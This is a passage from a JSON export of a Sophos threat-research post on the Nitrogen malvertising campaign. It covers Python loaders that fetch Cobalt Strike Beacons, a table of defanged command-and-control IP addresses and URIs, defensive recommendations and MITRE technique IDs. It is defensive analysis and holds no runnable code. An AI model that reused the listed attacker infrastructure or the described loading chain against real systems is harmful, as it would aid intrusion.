discussed in this subsection are included in the IoC file on our GitHub.)<\/p>\n<p>Once the work*.py scripts load, they execute a compiled object, which contains the URL of the next stage; for example, the script work3.py downloads the file work3 from the same server. The downloaded work3 file is a Cobalt Strike Beacon.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-16.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92949\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-16.png\" alt=\"Code executed by the python scripts\" width=\"640\" height=\"270\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-16.png 780w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-16.png?resize=300,127 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-16.png?resize=768,324 768w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 16: Compiled object executed by work*.py<\/em><\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-92950\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png\" alt=\"Hex code showing the URL for a command-and-control server used by Cobalt Strike\" width=\"613\" height=\"602\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png 613w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png?resize=300,295 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png?resize=32,32 32w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png?resize=50,50 50w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/figure-17.png?resize=64,64 64w\" sizes=\"auto, (max-width: 613px) 100vw, 613px\" \/><\/a><\/p>\n<p><em>Figure 17: Compiled code containing a Cobalt Strike C2 server URL<\/em><\/p>\n<p>SophosLabs was able to recover several Cobalt Strike Beacons from targeted servers:<\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"319\"><strong>C2 Server<\/strong><\/td>\n<td width=\"319\"><strong>HttpPostUri<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"319\">45.81.39[.]177,\/jquery-3.3.1.min.js<\/td>\n<td width=\"319\">\/jquery-3.3.2.min.js<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">45.81.39[.]175,\/jquery-3.3.1.min.js<\/td>\n<td width=\"319\">\/jquery-3.3.2.min.js<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">167.88.164[.]141,\/jquery-3.3.1.min.js<\/td>\n<td width=\"319\">\/jquery-3.3.2.min.js<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">45.66.230[.]215,\/jquery-3.3.1.min.js<\/td>\n<td width=\"319\">\/jquery-3.3.2.min.js<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">45.66.230[.]216,\/jquery-3.3.1.min.js<\/td>\n<td width=\"319\">\/jquery-3.3.2.min.js<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">23.227.196[.]140,\/broadcast<\/td>\n<td width=\"319\">\/1\/events\/com.amazon.csm.csa.prod<\/td>\n<\/tr>\n<tr>\n<td width=\"319\">85.217.144[.]164,\/broadcast<\/td>\n<td width=\"319\">\/1\/events\/com.amazon.csm.csa.prod<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>Sophos detected and remediated the observed infections before the threat actors were able to perform further hands-on-keyboard activity or deploy additional payloads.<\/p>\n<h2>Conclusion \u2013 an initial-access work in progress<\/h2>\n<p>Abuse of pay-per-click advertisements displayed in search engine results has become a popular tactic among threat actors. Given the various types of trojanized installers leading to Nitrogen infections, we assess that the threat actors are trying to cast a wide net to lure unsuspecting users seeking certain IT utilities, and it is likely this campaign will attempt to impersonate other types of popular software to deliver Nitrogen in future attacks.<\/p>\n<p>The threat actors attempted to mask their activity through various techniques, which highlights the importance of comprehensive and robust detection solutions. Sophos products protect against various aspects of this campaign; specifically, in the observed cases, HeapHeapProtect provided quick identification and remediation of unauthorized access and follow-on activity in targeted environments. Additionally, Sophos\u2019 memory detections for Cobalt Strike components spots and flags further compromise tactics, allowing for dynamic detection throughout the attack chain.<\/p>\n<h2>Recommendations<\/h2>\n<ul>\n<li>Be aware of served advertisements from search engines<\/li>\n<li>Use ad-blocking extensions or run the defaults in browsers with built-in ad-blocking capabilities. When choosing an ad-blocker, we recommend opting into those that allow you to block \u201cnon-intrusive advertising,\u201d thus restricting ads that search engines post on their own sites.<\/li>\n<li>Consider restricting the capability to mount virtual file systems via Group Policy Objects (GPO)<\/li>\n<li>Beware of downloading abnormal file extensions\n<ul>\n<li>Since the security crackdown on Office macros<a href=\"https:\/\/news.sophos.com\/en-us\/2022\/10\/12\/are-threat-actors-turning-to-archives-and-disk-images-as-macro-usage-dwindles\/\">, threat actors have increasingly used password protected archives<\/a> (.zip, .rar), along with virtual file system formats, such as .iso, .vhd, and .img.<\/li>\n<li>Consider disabling auto-mounting of disk image files, such as .iso files.<\/li>\n<\/ul>\n<\/li>\n<li>Be aware of suspicious-looking websites and keep an eye out for indicators of phishing, such as:\n<ul>\n<li>A call to urgency<\/li>\n<li>Misspellings and poor grammar<\/li>\n<li>Unprofessional marketing<\/li>\n<\/ul>\n<\/li>\n<li>Avoid storing credentials within the Registry and proactively search for credentials in the Registry to remediate potential risk. If software must store credentials in the Registry, then ensure associated accounts have limited permissions to avoid abuse if they are acquired by a threat actor.<\/li>\n<\/ul>\n<h2>Indicators of Compromise<\/h2>\n<p>A full set of related indicators of compromise is available <a href=\"https:\/\/github.com\/sophoslabs\/IoCs\/blob\/master\/Nitrogen%202023-07.csv\">on our GitHub<\/a>.<\/p>\n<h2>MITRE TTPs identified in this analysis<\/h2>\n<p>T1583.001: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1583\/001\/\">Acquire Infrastructure: Domains<\/a><\/p>\n<p>T1583.008: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1583\/008\/\">Acquire Infrastructure: Malvertising<\/a><\/p>\n<p>T1584.001: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1584\/001\/\">Compromise Infrastructure: Domains<\/a><\/p>\n<p>T1608.001: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1608\/001\/\">Stage Capabilities: Upload Malware<\/a><\/p>\n<p>T1588.002: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1588\/002\/\">Obtain Capabilities: Tool<\/a><\/p>\n<p>T1574.002: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1574\/002\/\">Hijack Execution Flow: DLL Side-Loading<\/a><\/p>\n<p>T1053.005: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1053\/005\/\">Scheduled Task\/Job: Scheduled Task<\/a><\/p>\n<p>T1069.002: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1069\/002\/\">Permission Groups Discovery: Domain Groups<\/a><\/p>\n<p>T1552.002: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1552\/002\/\">Unsecured Credentials: Credentials in Registry<\/a><\/p>\n<p>T1547.001: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1547\/001\/\">Boot or Logon Autostart Execution: Registry Run Keys \/ Startup Folder<\/a><\/p>\n<p>T1553.005: <a href=\"https:\/\/attack.mitre.org\/techniques\/T1553\/005\/\">Subvert Trust Controls: Mark-of-the-Web Bypass<\/a><\/p>\n<p>&nbsp;<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2023\/07\/26\/into-the-tank-with-nitrogen\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/07\/nitrogen-hero-image.jpg\"\/><\/p>\n<p><strong>Credit to Author: Gabor Szappanos| Date: Wed, 26 Jul 2023 10:00:04 +0000<\/strong><\/p>\n<p>The element originally known as \u201cfoul air\u201d stinks up computers as a new initial-access campaign exhibiting some uncommon techniques<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[129,29861,10531,29862,28079,27030,16771],"class_list":["post-22546","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-featured","tag-initial-access","tag-malvertising","tag-nitrogen","tag-sideloading","tag-sophos-x-ops","tag-threat-research"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/22546","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=22546"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/22546\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=22546"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=22546"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=22546"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}